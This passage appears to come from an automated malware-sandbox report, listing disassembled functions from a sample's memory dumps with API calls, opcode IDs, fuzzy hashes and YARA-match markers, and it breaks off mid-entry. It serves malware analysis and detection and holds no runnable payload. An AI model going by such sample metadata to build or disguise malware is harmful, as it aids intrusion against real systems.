                                                • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A40078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A40048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A407AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418449, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: hA
                                                • API String ID: 1279760036-1221461045
                                                • Opcode ID: 42e0fd6b2c81acb2994fc9be0ec5b17ccd843482f7a3e512c1ea0f0c5289dd12
                                                • Instruction ID: 964282dfa324f0a822d429b49a854c38aed4406d28d635d7fd5a55964b97aa33
                                                • Opcode Fuzzy Hash: 42e0fd6b2c81acb2994fc9be0ec5b17ccd843482f7a3e512c1ea0f0c5289dd12
                                                • Instruction Fuzzy Hash: 3DF0A9B22002106BDA24EF88DC80EE7736CEF88320F00895AFA485B241CA31EA44C6E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
                                                • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                • Opcode Fuzzy Hash: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
                                                • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004184F2, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: dc84ea3b8b4172ddf986da7ac6fc529e5646eadbd7b2b50d88320bfafe8e9fbb
                                                • Instruction ID: d3b014c9be516436179cb952a9bde72c33ca0b55660c850cd9dcd906273dea5c
                                                • Opcode Fuzzy Hash: dc84ea3b8b4172ddf986da7ac6fc529e5646eadbd7b2b50d88320bfafe8e9fbb
